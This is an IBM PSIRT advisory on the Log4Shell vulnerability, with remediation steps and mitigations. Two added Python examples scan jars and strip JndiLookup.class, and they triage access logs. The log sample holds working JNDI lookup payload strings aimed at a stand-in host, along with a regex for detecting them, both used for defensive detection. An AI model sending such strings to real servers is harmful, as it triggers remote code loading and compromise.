An update on the Apache Log4j CVE-2021-44228 vulnerability – IBM PSIRT Blog

Dec 12, 2021 9:10 pm EST

Categorized: Critical Severity


IBM is actively responding to the reported remote code execution vulnerability in the Apache Log4j 2 Java library dubbed Log4Shell (or LogJam). We are investigating and taking action for IBM as an enterprise, IBM products and IBM services that may be potentially impacted, and will continually publish information to help customers detect, investigate and mitigate attacks, if any, to their IBM products and services.


IBM Enterprise
IBM is continuing to inventory our products and systems potentially impacted by the vulnerability. As necessary, we are updating to Log4j version 2.15, which fixes the vulnerability, and applying mitigations in the interim, even in cases where additional control layers such as network controls and web application firewalls have prevented exploitation of this vulnerability.


IBM Software and Systems Products
IBM is continuing a product-by-product analysis for Log4j impacts. If an IBM Software or Systems product is impacted, a bulletin will be posted on this blog as a remediation or fix becomes available. Such on-premises IBM products will then have to be updated by the customer.


IBM Consulting 
IBM Consulting will continue to work directly with its clients in support of the remediation of custom applications and services through its normal delivery center and platform support processes.


IBM Security

The IBM X-Force team of hackers, responders, researchers, intelligence analysts and investigators is actively engaged in the response to Log4Shell. Detection and Indicators of Compromise (IOCs) for IBM Security tools are being published on the IBM X-Force Exchange.

The IBM Managed Security Services (MSS) organization also is reviewing all systems to eliminate the vulnerability. The team is tracking patch releases for impacted platforms that IBM Security Services manages. Clients may see Security Advisory tickets and requests to patch managed devices in the MSS portal.


Assistance for customers suspecting potential compromise also is available 24/7 via IBM Security X-Force’s US hotline 1-888-241-9812 | Global hotline (+001) 312-212-8034.

IBM Cloud and as-a-Service Products
For IBM Cloud services, IBM is remediating managed as-a-service Cloud offerings as applicable, even in cases where additional control layers such as network controls and web application firewalls have prevented exploitation of this vulnerability.


Clients of IBM Cloud’s Classic and VPC Virtual Machine services are responsible for remediating any Log4j vulnerabilities in code running inside those Virtual Machines. IBM Cloud-based virtual machine images and package repositories are being updated wherever they contain the vulnerable code.


For the portion of IBM Cloud services using Java technologies, IBM is continuing to assess and remediate any remaining services using Log4j and validate that mitigating controls remain effective.


IBM’s recommendations to its clients:

At this time, IBM recommends organizations running Apache Log4j take the following actions: 

Check for vulnerable versions of Apache Log4j in your environments and applications.
Implement the latest patch in production environments as soon as possible.
Monitor IBM PSIRT for security bulletins.
Monitor for vendor patches as they become available.

Reference material can be found at the Apache.org Log4j Security Vulnerability page.

IBM X-Force also has provided an analysis of the Log4j vulnerability, which can be found on the IBM Security Intelligence blog.

Per the Apache Log4j security vulnerability advisory, the following temporary mitigations may provide interim protection for clients who are unable to upgrade Log4j in their workloads quickly:

In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath:

zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
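As an added example (not IBM's or Apache's code) covering both the "check for vulnerable versions" recommendation above and the class-removal mitigation from the Apache advisory: the Python below inventories jars under a directory, reads the log4j-core version from its Maven pom.properties, flags any jar below 2.15.0 that still ships JndiLookup.class, and rewrites such jars without that entry, which is what the zip -q -d command above does. The fixture jars it builds are constructed stand-ins with placeholder bytes rather than real bytecode; FIXED_VERSION, POM_PROPS and the function names are this example's own. It does not look inside nested archives (a log4j-core jar packed inside a WAR), so those need unpacking first.

```python
"""Added example (not IBM's or Apache's code): inventory log4j-core jars and
apply the Apache-documented JndiLookup class removal without the zip CLI."""
import os
import shutil
import tempfile
import zipfile

# Paths inside a log4j-core jar: the class the Apache advisory says to remove,
# and the Maven metadata that carries the version string.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 15, 0)  # version the post names as the fix (assumption: numeric compare)


def parse_version(text):
    """Turn '2.14.1' or '2.0-beta9' into a comparable 3-tuple (suffix ignored)."""
    parts = []
    for piece in text.split("-")[0].split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    parts += [0] * (3 - len(parts))
    return tuple(parts[:3])


def inspect_jar(path):
    """Return (version or None, has_jndi_lookup) for one jar."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    return version, JNDI_LOOKUP in names


def is_vulnerable(version, has_jndi_lookup):
    """Affected if JndiLookup.class is present and the version is below 2.15.0;
    an unknown version with the class present is treated as affected."""
    if not has_jndi_lookup:
        return False
    return version is None or parse_version(version) < FIXED_VERSION


def scan_tree(root):
    """Walk root; map each jar path to (version, has_jndi_lookup, vulnerable)."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".jar", ".zip")):
                path = os.path.join(dirpath, name)
                try:
                    version, has = inspect_jar(path)
                except zipfile.BadZipFile:
                    continue  # not a readable archive; skip it
                results[path] = (version, has, is_vulnerable(version, has))
    return results


def strip_jndi_lookup(path):
    """Same effect as 'zip -q -d log4j-core-*.jar .../JndiLookup.class':
    rewrite the jar without that entry. Returns True if an entry was removed."""
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        fd, tmp = tempfile.mkstemp(suffix=".jar", dir=os.path.dirname(path) or ".")
        os.close(fd)
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP:
                    dst.writestr(info, src.read(info.filename))
    shutil.move(tmp, path)  # replace the original on the same filesystem
    return True


def make_sample_jar(path, version, with_jndi=True):
    """Constructed fixture: a fake log4j-core jar with placeholder class bytes."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\nversion=%s\n" % version)
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if with_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")


def run_demo():
    """Build two constructed jars, scan, mitigate the affected one, rescan.
    Returns (before, after) scan results keyed by jar file name."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    make_sample_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "2.14.1")
    make_sample_jar(os.path.join(root, "lib", "log4j-core-2.15.0.jar"), "2.15.0")
    before = {os.path.basename(p): r for p, r in scan_tree(root).items()}
    for path, (_, _, vulnerable) in scan_tree(root).items():
        if vulnerable:
            strip_jndi_lookup(path)
    after = {os.path.basename(p): r for p, r in scan_tree(root).items()}
    shutil.rmtree(root)
    return before, after
```

Calling run_demo() shows the 2.14.1 fixture reported as affected before and clean after the rewrite, while the 2.15.0 fixture keeps its JndiLookup entry and is reported as not affected on version alone. On a real host, point scan_tree at the application's library directories and treat any hit with an unknown version as affected until confirmed otherwise; removing the class only works for releases where the advisory names it as the mitigation, so upgrading remains the complete fix.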


Users of IBM’s Cloud Internet Services, powered by Cloudflare, may use the Web Application Firewall feature to mitigate attacks against their own workloads hosted in IBM Cloud, by detecting and blocking requests that attempt to exploit the vulnerability. More details are available at https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
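As an added example (not IBM's, Cloudflare's or Apache's code) of the request-side detection such a WAF performs, and of what to look for when reviewing existing web-server logs: the Python below scans constructed access-log lines for a JNDI lookup string, percent-decoding each line first so encoded forms are not missed, and reports the source address and JNDI URL scheme for triage. The log lines, addresses and hostnames are constructed samples using reserved documentation values; JNDI_RE and the function names are this example's own. A production WAF rule set handles further obfuscation that this deliberately narrow matcher does not.

```python
"""Added example (not IBM's or Cloudflare's code): flag access-log lines that
carry a JNDI lookup string and summarise them per source address."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in combined log format; addresses and hosts are
# reserved documentation values, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Dec/2021:20:55:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Dec/2021:20:55:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://lookup.example/a}"
203.0.113.9 - - [12/Dec/2021:20:55:04 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2Flookup.example%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"
198.51.100.4 - - [12/Dec/2021:20:55:05 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# A JNDI lookup as Log4j would parse it: ${jndi:<scheme>:...}, case-insensitive.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)", re.IGNORECASE)


def percent_decode(text, rounds=3):
    """Undo percent-encoding, repeating for double-encoded input (bounded)."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def find_jndi(line):
    """Return the JNDI URL scheme (ldap, rmi, dns, ...) found in line, else None."""
    match = JNDI_RE.search(percent_decode(line))
    return match.group(1).lower() if match else None


def triage(log_text):
    """Scan log lines; return one dict per hit with line number, source IP and scheme."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append({"line": number, "source": line.split(" ", 1)[0], "scheme": scheme})
    return hits


def hits_by_source(hits):
    """Count hits per source address, the usual pivot for blocking or escalation."""
    return Counter(hit["source"] for hit in hits)


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for hit in found:
        print("line %(line)d from %(source)s: jndi scheme %(scheme)s" % hit)
    print(dict(hits_by_source(found)))
```

Run against the constructed sample, triage() flags lines 2 and 3 (both from 203.0.113.9, one via the User-Agent header and one via a percent-encoded query string) and leaves the two ordinary requests alone. The same scan over a real access log is a quick first pass for the "suspecting potential compromise" case above: a hit means the string reached the server, not that the lookup succeeded, so the next step is to check whether the host made the outbound connection the string asks for, which is exactly what the egress blocking recommended below is meant to stop.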


IBM recommends that users of IBM Cloud’s firewall services, including Fortigate, Juniper vSRX, Security Groups, and Network ACLs, configure their firewalls to block unauthorized outbound connections to mitigate against this and similar vulnerabilities. In addition, Fortigate has released IPS rules to detect and block this specific vulnerability (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability), as has Juniper (https://threatlabs.juniper.net/home/search/#/details/?sigtype=ips&sigid=HTTP:APACHE:LOG4J-JNDI-MGNR-RCE). If you are using a next generation firewall appliance from another supplier, IBM recommends contacting the firewall vendor for specific guidance for mitigating the Log4j vulnerability.
